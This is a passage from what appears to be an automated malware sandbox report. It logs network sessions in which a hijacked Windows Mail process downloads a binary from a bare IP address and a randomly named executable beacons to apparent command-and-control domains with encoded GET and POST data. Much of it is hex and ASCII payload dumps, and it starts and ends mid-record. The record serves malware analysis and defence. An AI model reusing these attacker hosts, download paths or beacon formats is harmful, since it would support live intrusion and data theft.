                                                                  Data Ascii: WsTNCPlcetXJ5K+tUwFhQUaszDcDxLvpShJ2aF0Uh90LnzrS2tW1vky+nCzRJ6P/E0Olofkk+4zkgRn2BC7vL2I0BHU2Q2WX4tqZMcYHekWkOGxEmEAjHsCTXc+CX4b7BZQZ28xyXotB3Kd2OzC7clglJxFF3rvc2Rh4C4ttbqWU+bv0urbxUIt1VTBJfrME08OvOQ64D4MtjFI5m3vxPsLONpDN1zi1pEzAU6bPguMLMVHEZ0V
                                                                  Apr 24, 2024 06:35:03.790854931 CEST1289INData Raw: 61 55 38 48 51 6e 78 69 32 77 36 77 7a 54 6a 75 39 33 41 50 73 68 79 57 77 4f 7a 2f 77 75 47 70 35 72 51 36 54 36 6f 4b 64 6c 51 47 58 6a 78 43 61 6b 48 39 56 68 4b 58 35 75 44 4f 76 31 5a 35 6d 69 46 51 63 2f 47 55 4f 55 61 76 55 64 75 58 4a 76
                                                                  Data Ascii: aU8HQnxi2w6wzTju93APshyWwOz/wuGp5rQ6T6oKdlQGXjxCakH9VhKX5uDOv1Z5miFQc/GUOUavUduXJvIxr/FURaHwgufOk6yRHsWGarwpmwSD8rp8aSXEu42WLAqczePqdMUdntc4e3oUs4Dfzo/70lo1O8psw4oR2805duzWCh5VxfMK/5oz4hzRrWKoTPEkDvtD586HgqfOh4KnzoeCp86HgqfOh4KnzoeCp86q5VkqGnJ
                                                                  Apr 24, 2024 06:35:03.790894985 CEST1289INData Raw: 36 4f 79 31 4c 62 71 35 56 30 65 30 66 67 74 47 4c 53 2f 59 77 6b 71 5a 76 4a 78 77 50 56 55 42 34 2b 4f 6a 67 78 6c 2f 52 63 49 57 57 78 50 55 65 37 36 4c 4c 63 4f 67 2b 4c 57 53 39 77 4c 4d 53 37 36 46 38 69 47 32 2b 4c 61 5a 50 34 64 63 70 71
                                                                  Data Ascii: 6Oy1Lbq5V0e0fgtGLS/YwkqZvJxwPVUB4+Ojgxl/RcIWWxPUe76LLcOg+LWS9wLMS76F8iG2+LaZP4dcpqgoN/My6X+b/Uc79Ammy/RSCG0m38VbKFu7InEngTK3fgP+LO7ThckHcEqGPN49EhujJ6Ynj9WRdLVJAIuBefOh4KnzoeCp86HgqfOh4KnzoeCp86HgqfOrdzoBAeoASC3VINI16DIpIfCp9rp6fJuDiLblI1lPW79
                                                                  Apr 24, 2024 06:35:03.790931940 CEST1289INData Raw: 4b 6e 7a 6f 65 43 70 38 36 48 67 71 66 4f 68 34 4b 4e 79 49 2b 56 65 6b 65 48 4a 2b 44 6d 33 4d 6b 7a 34 4a 58 36 50 6b 30 4b 30 59 70 66 54 30 50 65 70 30 4f 79 5a 71 6f 6c 4f 36 66 44 32 4b 4e 69 63 74 4d 6c 68 62 59 48 77 67 43 76 39 78 2b 6c
                                                                  Data Ascii: KnzoeCp86HgqfOh4KNyI+VekeHJ+Dm3Mkz4JX6Pk0K0YpfT0Pep0OyZqolO6fD2KNictMlhbYHwgCv9x+lsUHYk1D2eI7J1kdzTYK9hI+J1Aos2ylkQrnLaSKfLOB4t7K1prYKpziju5efzXKr7/MUB/E61Ie/bN5oXBMsAHovO8eyPUoBXmfyCP1MRAeyFaXhDyf+OZmbczOppfrliuDjldJC1sIQ7Jm8f03reCq7M0KIJbOKO
                                                                  Apr 24, 2024 06:35:03.791024923 CEST1289INData Raw: 71 47 59 65 79 34 58 2b 69 52 69 66 34 37 33 55 78 5a 67 57 4b 36 48 56 6f 61 33 65 4c 57 71 58 7a 33 75 30 57 67 69 37 33 6f 7a 44 4d 68 6f 39 66 76 49 53 39 4a 30 62 4f 74 4f 77 55 72 42 34 79 67 4e 64 51 57 69 67 2b 37 66 53 31 73 61 37 47 69
                                                                  Data Ascii: qGYey4X+iRif473UxZgWK6HVoa3eLWqXz3u0Wgi73ozDMho9fvIS9J0bOtOwUrB4ygNdQWig+7fS1sa7Gi7Xwy3jz1L5RuCtnz67o/8/frsqLnM/IfDIhTtzJb+f/TLhGSce1Xchwsef/YBMfqHPppfqlgKDjl1IE7oJCXL2nBtR8rLfw2dHMCadKRSWvqfuAoLmezG7cQonu4EV5fb27ED7y0Tb1icdmlAb+kaOVmWfJruptn8
                                                                  Apr 24, 2024 06:35:04.090784073 CEST1289INData Raw: 7a 6f 65 43 70 38 36 48 67 71 66 4f 68 34 4b 6e 7a 71 75 54 66 65 69 61 65 59 6f 4e 61 4c 74 44 64 55 6b 6f 4b 5a 48 48 45 36 56 49 36 57 63 41 72 56 76 57 53 54 50 42 58 61 68 75 39 32 43 67 77 36 79 69 31 78 4c 54 46 71 4b 73 77 57 6b 52 6f 75
                                                                  Data Ascii: zoeCp86HgqfOh4KnzquTfeiaeYoNaLtDdUkoKZHHE6VI6WcArVvWSTPBXahu92Cgw6yi1xLTFqKswWkRouZdc+jm6faQ3+vXp1k59EiUddBll72DLfZqzomOKvEu+0wCWf0i2xS6svYaKRlOFq9i22H79E/u/TYyoEdWwOz/wOOpybZ7hopZHgiK+t105o535TEJKsBHTvurqrjO0ON4WK/rtWHzHj1aGwbaTX8o1OfmrdY8AxJ


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44973787.121.105.163808156C:\Program Files (x86)\Windows Mail\wab.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 24, 2024 06:35:28.779053926 CEST171OUTGET /fBizb192.bin HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: 87.121.105.163
                                                                  Cache-Control: no-cache
                                                                  Apr 24, 2024 06:35:29.079538107 CEST1289INHTTP/1.1 200 OK
                                                                  Date: Wed, 24 Apr 2024 04:35:28 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Last-Modified: Tue, 23 Apr 2024 10:39:37 GMT
                                                                  ETag: "43440-616c12ba50c40"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 275520
                                                                  Content-Type: application/octet-stream
                                                                  Data Raw: 52 26 eb 8d a8 be 02 12 f8 49 fc 45 37 21 55 e5 71 8b d2 cb 21 5a 6a 57 f0 c1 a2 ab 8f 74 bb 71 a8 95 2d e5 3f 31 7a df f8 f5 21 d9 98 76 05 3c a0 8d c5 6d 1b 4f a6 9e 9a e0 b6 27 bd f3 f7 b8 fd 5c cf 05 3d bf 79 6d 59 88 8f 74 40 e6 79 44 0d 9f d8 a0 4b e3 a1 03 b3 db d2 3c e1 a6 8a c4 a8 ec 4c 83 db 6e be 40 5c 08 38 4e 20 bf 50 77 0a 0f 52 d9 7e ab 32 e8 5c 92 e2 9c 12 51 ba 37 58 0c 47 e0 7b 8a d6 0c 44 9d 09 13 1c ef 50 e9 b6 2a 9c 9a c1 b6 40 2e 29 60 c8 03 ee db 8a f3 c0 b4 65 c6 62 f1 5d a0 39 67 80 23 b3 02 dc 34 ab ad 03 ec 15 65 76 ce d3 f1 ff 16 36 dc b3 46 d3 40 53 72 63 d9 5d ac ef cd 63 ee 12 b9 c7 d2 41 e6 85 f2 6a 4f 91 a0 41 92 ad 94 40 50 a4 e1 bb a6 cd ae 8a 3a 91 8b ee 7f f8 bf 0f ba 02 7e 35 99 82 ea dc 2c cf e8 14 9a fe b6 38 da dd 90 27 4a 45 51 4b 5b 39 d3 c9 3e 33 d3 84 d3 ea 0d 12 cd 34 33 e5 28 5b 68 3e 92 ca 0f 4a ea 8f d5 2c 0a 17 5d 74 71 cd c0 a7 82 49 23 79 a1 74 4a 64 8e 79 21 2a e5 70 87 e1 8e d2 fe 94 f5 4f 67 e7 de b3 3b ba b9 5b b2 37 43 7e 64 cf e6 c8 ef 50 24 aa 97 f0 23 2c 8e 8d d8 8c 5e a3 72 60 fc 8a 67 4d 8b 83 4d 91 0f 07 3b fe 34 9a 05 b9 5c 27 4e 48 a8 d3 81 99 59 f5 34 cb 5a 46 af 73 e4 5f 9b a6 d3 cc 1d 03 9e 3f dd 99 b7 3d d7 58 09 16 19 f0 5a 45 2a 3c 0c 3b 3e 92 6e fb 7b cd b1 1e 02 a6 3f e3 91 df 43 2e c5 b3 eb 17 91 2b 71 84 dd 42 b0 ac 9b 03 ed 8e fa 45 98 48 64 8d ec 96 38 d5 a0 0a d3 3d be 0b 95 ce e4 0c 8c 70 1d 29 36 95 1f a5 8b df 94 3b 79 12 a6 f3 d3 38 9c 87 0a 38 55 0c 97 cc e7 f3 2d 9b 22 1e a6 01 07 c7 42 51 f1 f5 60 42 62 da 3f 34 8e d5 58 26 25 61 5e 18 2f f0 a0 e3 97 36 1b 52 17 a1 3f be 86 71 ad 26 98 4c 65 2a f2 c0 81 5c 55 b7 11 17 64 fa 92 e0 88 62 be 6f 28 73 b8 ef 1f f4 b3 e6 1d 0a ea 50 3b 3d a5 45 a0 4d a0 86 4b 9a dc f4 3c bc bd f4 1e 33 63 3e 7e 33 9f 06 fd 9d 8d 94 55 83 d8 56 b0 c7 48 56 e9 2c 8a 8f 88 3f 4c da ea 08 08 35 a3 ea 3d f5 13 0d 7a 12 2f 78 af b5 c0 d4 dd 70 9f c5 7f f3 30 ef 53 8a 30 bb 90 24 d2 75 76 9f 94 46 7d 41 ec be 90 83 91 7b 40 0d 03 50 7a c5 04 52 bc 7e 30 cb 9e 6a 2a c8 f9 22 eb 53 da e3 7b 79 6c 4c b7 62 d3 9c cc 1d 29 b7 0d 37 4a f1 89 3f 6a e6 1a ab b2 82 2f 9e b8 87 f7 36 37 6b 82 24 c8 dc d2 9f 01 0b 33 0b 89 d3 f2 f4 a7 f8 18 ca 93 f7 35 ad 89 d8 19 9e 2b 06 3c f1 59 8b 12 f8 fa 4e e0 ec c6 b6 48 c1 09 eb ee 10 ce 6e f9 c3 97 42 ac 85 11 83 db 60 93 5d 4b d9 11 2e 12 d6 da a5 61 00 b2 74 b4 f3 5b 21 65 a1 49 dd 5b 82 68 0c 8a 46 9d 95 a5 97 07 76 0b d2 53 25 4f 2b 71 ac 4b 78 61 21 d9 e7 5c 39 8d 6b 40 7d 7b 46 d2 59 2e d3 61 ff 0c b1 2c 44 03 04 f1 35 01 0b 24 9e 1e a6 24 d4 68 3f 37 80 57 72 a5 99 81 03 58 41 59 87 7a c1 5c 0a 64 75 ec e4 57 5e 41 26 d3 94 21 e5 b3 96 f3 f6 e0 5f 18 2e c8 b5 76 fa bd cb 94 56 98 3e 09 28 aa a5 02 a8 4e 36 b4 34 37 8b 9f eb 5d 67 cf 4e 58 de ca e5 db 6b b0 74 7c c3 4b a8 06 6a 6d b4 69 73 87 79 c7 45 00 7b f2 a0 ac c4 b9 18 b1 e8 18 b3 11 30 23 6f 3e bb b7 ef 9c f6 f4 99 ef 88 14 94 77 b4 57 1f 81 8a 38 2b c7 4d 98 cd 8c 26 3d da 22 79 d6 ce e1 1f b8 01 bb 83 e9 f3 e0 dd 79 2a 58 78 1f fa e0 c9 cd 97 19 1f eb 8b 40 ce 62 2f 67 84 3a 22 0b bd 81 db 58 0b 3c 47 27 3a e7 77 12 4a ad 71 60 53 67 ff eb 5e e8 9c 92 e3 a5 8b 8b
                                                                  Data Ascii: R&IE7!Uq!ZjWtq-?1z!v<mO'\=ymYt@yDK<Ln@\8N PwR~2\Q7XG{DP*@.)`eb]9g#4ev6F@Src]cAjOA@P:~5,8'JEQK[9>343([h>J,]tqI#ytJdy!*pOg;[7C~dP$#,^r`gMM;4\'NHY4ZFs_?=XZE*<;>n{?C.+qBEHd8=p)6;y88U-"BQ`Bb?4X&%a^/6R?q&Le*\Udbo(sP;=EMK<3c>~3UVHV,?L5=z/xp0S0$uvF}A{@PzR~0j*"S{ylLb)7J?j/67k$35+<YNHnB`]K.at[!eI[hFvS%O+qKxa!\9k@}{FY.a,D5$$h?7WrXAYz\duW^A&!_.vV>(N647]gNXkt|KjmisyE{0#o>wW8+M&="yy*Xx@b/g:"X<G':wJq`Sg^
                                                                  Apr 24, 2024 06:35:29.079608917 CEST1289INData Raw: 44 fc e2 a2 0b 10 63 1a 36 86 4a 11 90 57 5d 63 7f 20 c7 86 29 f8 57 46 6f ec 3c b8 47 f4 aa 3b 29 9e a6 ed b8 82 fa 13 6b b9 51 f4 ab ef 5d be 95 70 b1 bd be 4b 19 0c c2 20 0e 8e 84 1d 04 a4 93 f2 36 79 cb 6b be c5 00 a1 6d a0 3b 8e 73 2f bf 91
                                                                  Data Ascii: Dc6JW]c )WFo<G;)kQ]pK 6ykm;s/|YJ?_u``-$#3FCoK;=946)-8+/5i82F91h;Co$&K]u8[=&V|iBVOcS=k7mk&zZ
                                                                  Apr 24, 2024 06:35:29.079677105 CEST1289INData Raw: 72 a5 99 81 03 58 41 59 87 7a c1 5c 0a 64 75 ec e4 57 5e 41 26 d3 94 21 e5 b3 96 f3 f6 e0 5f 18 2e c8 b5 76 fa bd cb 94 56 98 3e 09 28 aa a5 02 a8 4e 36 b4 34 37 8b 9f eb 5d 67 cf 4e 58 de ca e5 db 6b b0 74 7c c3 4b a8 06 6a 6d b4 69 73 87 79 c7
                                                                  Data Ascii: rXAYz\duW^A&!_.vV>(N647]gNXkt|KjmisyE{0#o>wW8+M&="yy*Xx@b/g:"X<G':wJq`Sg^Dc6JW]c )WFo<G;)kQ]p
                                                                  Apr 24, 2024 06:35:29.079737902 CEST1289INData Raw: 50 7a c5 04 52 bc 7e 30 cb 9e 6a 2a c8 f9 22 eb 53 da e3 7b 79 6c 4c b7 62 d3 9c cc 1d 29 b7 0d 37 4a f1 89 3f 6a e6 1a ab b2 82 2f 9e b8 87 f7 36 37 6b 82 24 c8 dc d2 9f 01 0b 33 0b 89 d3 f2 f4 a7 f8 18 ca 93 f7 35 ad 89 d8 19 9e 2b 06 3c f1 59
                                                                  Data Ascii: PzR~0j*"S{ylLb)7J?j/67k$35+<YNHnB`]K.at[!eI[hFvS%O+qKxa!\9k@}{FY.a,D5$$h?7WrXAYz\duW^A&!_.vV>(N6
                                                                  Apr 24, 2024 06:35:29.079797029 CEST1289INData Raw: d1 1e c1 1f a5 b8 04 2c 3e e5 b0 2a 04 3a 3b 4d 46 f0 3f de c6 56 25 f8 f0 e7 ee c9 74 bb fe 72 e5 de db 75 7e 9f c9 37 56 9d f4 86 54 b2 1c 01 61 7c 13 aa 75 b0 e3 97 70 a3 04 42 f4 6a 49 68 fa 6f e7 70 73 66 e8 19 0e 0c 58 15 9c d9 62 65 bc 13
                                                                  Data Ascii: ,>*:;MF?V%tru~7VTa|upBjIhopsfXbeoTlp+?gHRD {(2#vSg$Uc0P-6Jy*~VQ=s:o\\pc+0IfBPz{R~@j*K(-vGPEJkR/av
                                                                  Apr 24, 2024 06:35:29.079876900 CEST1289INData Raw: 99 e7 f7 46 e0 89 99 6b d5 93 8c 8e b4 a3 98 d5 9c 63 ce 37 74 0b cd 4d 22 2e b3 dc 86 f1 cb ff bc 65 86 de a7 62 2c 78 18 71 82 16 18 e5 4f 67 62 1a a7 b2 3f a9 a6 4d c8 8e 33 64 77 db ce 08 33 d3 c7 4f 33 d9 68 84 4f 19 74 41 a0 a0 e9 b9 52 12
                                                                  Data Ascii: Fkc7tM".eb,xqOgb?M3dw3O3hOtARok(@5MN4VR-3^0Uk=LY*<9}VwqD)95T&NXC|,~{;yk_lml1s=di5BK_]uF&%
                                                                  Apr 24, 2024 06:35:29.079936981 CEST1289INData Raw: cd 59 50 a0 b7 97 06 3c 64 27 32 47 01 36 8a 4f 1d c8 b3 7c 24 ed 7a 54 dd ce 68 8e 22 bf d9 02 f6 b1 5e 87 7e ab 8a cf f2 e6 8d 6b 44 90 40 31 dd e1 3c 00 64 3d 2d b4 88 a8 8d ef 2a 31 fb e9 f7 5d bc ea e3 31 9e ae b7 f2 63 15 73 36 20 94 4b 42
                                                                  Data Ascii: YP<d'2G6O|$zTh"^~kD@1<d=-*1]1cs6 KB}c25g?M9U7yox@-rSqg|0i2R71`!>HL8qNCh$$@k'V,E<N,*,'gA
                                                                  Apr 24, 2024 06:35:29.079977036 CEST1289INData Raw: fa 57 fa 49 21 11 4e 80 19 68 9c e8 0a 66 c9 db cb 5e f5 16 40 94 16 54 fb d2 18 07 06 c3 cd f5 1b 37 13 77 9b 59 80 d9 9d ff 3f 80 05 e8 31 a8 97 8d 3d d5 6f c2 18 4a f6 ab 8f 2b 48 26 cb be a4 fc 05 66 5b d7 e6 b0 c4 41 b6 05 65 00 0b 47 0d 5f
                                                                  Data Ascii: WI!Nhf^@T7wY?1=oJ+H&f[AeG_[nuLtYDnZ~8=,ljxICRtXh-/yq7T@8`Im2{H"bP$3AB!k5'MS~lw0,mfob
                                                                  Apr 24, 2024 06:35:29.080035925 CEST1289INData Raw: 7b c2 b5 f4 60 a4 05 52 e9 42 18 ca 68 6c 42 82 8e 3c b3 de 15 40 ea 81 98 fd 31 68 53 56 b9 3b 9c f9 69 6f 24 26 1f 4f 24 85 11 39 99 a9 72 de 8a 7f 50 e0 3d 76 75 ca 1c e7 ac 8d 81 be a8 2a 5d 82 c6 4d 5a 9d 4c aa d8 61 16 aa c5 de c3 44 67 c4
                                                                  Data Ascii: {`RBhlB<@1hSV;io$&O$9rP=vu*]MZLaDg7B%KEk{%[|N!iwxW1M$R!1~jIXz%LQ2h5u#"cgf:7YM`^++/@dM_UVqB_k!!Lg
                                                                  Apr 24, 2024 06:35:29.080162048 CEST1289INData Raw: 53 a0 e0 dd 79 92 a4 78 1f fa 63 31 9e 98 56 dd a2 fe b7 26 c2 2d 67 84 c5 52 07 55 d9 d8 58 0b b5 02 cb b9 23 73 aa 46 d7 71 60 ca e4 1d 94 5d 2a 5d 6a e4 20 4b fe b7 77 b7 aa 8e c2 6c 9e 6c 87 4a 11 29 f3 12 63 7f 9e fb 86 29 f8 ef 42 6f ec 3c
                                                                  Data Ascii: Syxc1V&-gRUX#sFq`]*]j KwllJ)c)Bo<5;)^<ZNGZKI.T`s0k5Jk-s/)?b06.#^<,=@yt;=`%A1kyr#)Ld_HoxSi88xhK$&2du3rc
                                                                  Apr 24, 2024 06:35:29.379632950 CEST1289INData Raw: 9d 95 1a c2 19 76 0b e1 a5 9f 14 5b 71 ac 8c 3d 9d 91 d9 e7 5c 04 3d 6b 40 7d 74 0a 97 a5 64 a6 95 47 ab 79 4b 99 f4 eb f2 e2 c0 f1 21 15 e4 67 cb cb 6b c5 42 6b 64 a9 28 3d a5 03 58 41 59 06 83 ba 28 0a 64 08 cd a5 ef 08 14 73 86 63 c8 6e 71 57
                                                                  Data Ascii: v[q=\=k@}tdGyK!gkBkd(=XAY(dscnqWE6mr\~wQRQ|t*dD6,i=W~uq.*1 L%ug'Cz9+1v!Z=7%;W[BVA5%Q/X8=]$


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.44973947.91.88.207805164C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 24, 2024 06:36:12.028460979 CEST530OUTGET /gnbc/?ALLPg=JbKtchOp7P4H8n8&qRm=L9JeOsoYfW7LuiHbEVFIUxrrDEUMATYC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7darwqgM7ePv0Xp25EyyEytypCDy9EhkfmkBo= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en
                                                                  Connection: close
                                                                  Host: www.tyaer.com
                                                                  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                  Apr 24, 2024 06:36:12.350291967 CEST1254INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.20.1
                                                                  Date: Wed, 24 Apr 2024 04:36:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BA0FEF1E5AA6121301DBF60C07D7CEA828F428FCA088EEE669E91D2D400
                                                                  Set-Cookie: _csrf=7ddec6786ae3cb344638a5e1242c3c4c39c215fe3ee247f1bfed6524e6db02b7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GhG2r_86DDM_NqV6QBWP1TkH6JUUXdl0%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 59 59 5f 5f 71 41 6c 51 45 67 4d 70 38 65 71 42 35 61 42 69 50 49 5a 69 45 4f 59 53 76 75 55 59 6e 69 56 75 4f 46 37 4f 79 5a 43 37 6e 6a 4d 30 6e 70 34 66 6b 6a 6a 69 76 56 4a 35 39 65 2d 6f 31 76 66 45 36 6b 65 6b 4e 78 55 4d 73 44 74 75 52 39 58 46 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="BYY__qAlQEgMp8eqB5aBiPIZiEOYSvuUYniVuOF7OyZC7njM0np4fkjjivVJ59e-o1vfE6kekNxUMsDtuR9XFg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449742172.67.152.117805164C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 24, 2024 06:36:55.590217113 CEST790OUTPOST /gnbc/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate
                                                                  Accept-Language: en-US,en
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Connection: close
                                                                  Content-Length: 200
                                                                  Cache-Control: no-cache
                                                                  Host: www.theplays.shop
                                                                  Origin: http://www.theplays.shop
                                                                  Referer: http://www.theplays.shop/gnbc/
                                                                  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                  Data Raw: 71 52 6d 3d 50 48 6f 65 45 53 6c 53 62 5a 64 4c 6c 4d 4b 53 68 4b 4b 35 54 67 5a 78 34 35 72 41 6d 4d 4c 54 2b 49 38 48 6c 38 30 36 72 48 2b 52 67 7a 62 68 6e 6e 31 53 2b 54 37 4b 43 69 43 37 41 72 74 2f 69 35 6e 56 32 75 75 6c 67 38 50 38 66 58 74 36 32 4d 63 57 71 71 57 6e 43 78 6a 76 6f 53 48 39 78 79 2f 4f 70 52 65 57 31 63 49 79 4b 30 66 74 54 79 4a 4f 32 41 78 44 70 75 6f 4c 33 2f 57 7a 2f 67 51 55 61 66 71 75 74 65 36 75 6c 37 71 42 5a 33 76 30 33 55 49 2f 41 4f 65 61 4d 75 6c 59 43 35 6c 68 55 49 50 4e 54 44 34 7a 54 2b 44 34 38 58 69 4e 65 48 62 33 57 35 35 75 74 79 44 71 2b 77 3d 3d
                                                                  Data Ascii: qRm=PHoeESlSbZdLlMKShKK5TgZx45rAmMLT+I8Hl806rH+Rgzbhnn1S+T7KCiC7Art/i5nV2uulg8P8fXt62McWqqWnCxjvoSH9xy/OpReW1cIyK0ftTyJO2AxDpuoL3/Wz/gQUafqute6ul7qBZ3v03UI/AOeaMulYC5lhUIPNTD4zT+D48XiNeHb3W55utyDq+w==
                                                                  Apr 24, 2024 06:36:56.125325918 CEST717INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 24 Apr 2024 04:36:56 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgG%2BOnfjbAoKEpMRYh3VkV%2FYY3YhN4JCPp1MLtGWEip4LLgzBsjlVa5RDdpy8yo%2FG4uh6DavyYgkDaBbYqsaNsjNHCroyp36YbR5qvltkIV%2F1QhUM4lN%2F9DIbT0r5a%2BOZJOjRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 87936527fbc22f71-LAX
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                  Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                  Apr 24, 2024 06:36:56.125358105 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449743172.67.152.117805164C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 24, 2024 06:36:58.269227028 CEST810OUTPOST /gnbc/ HTTP/1.1
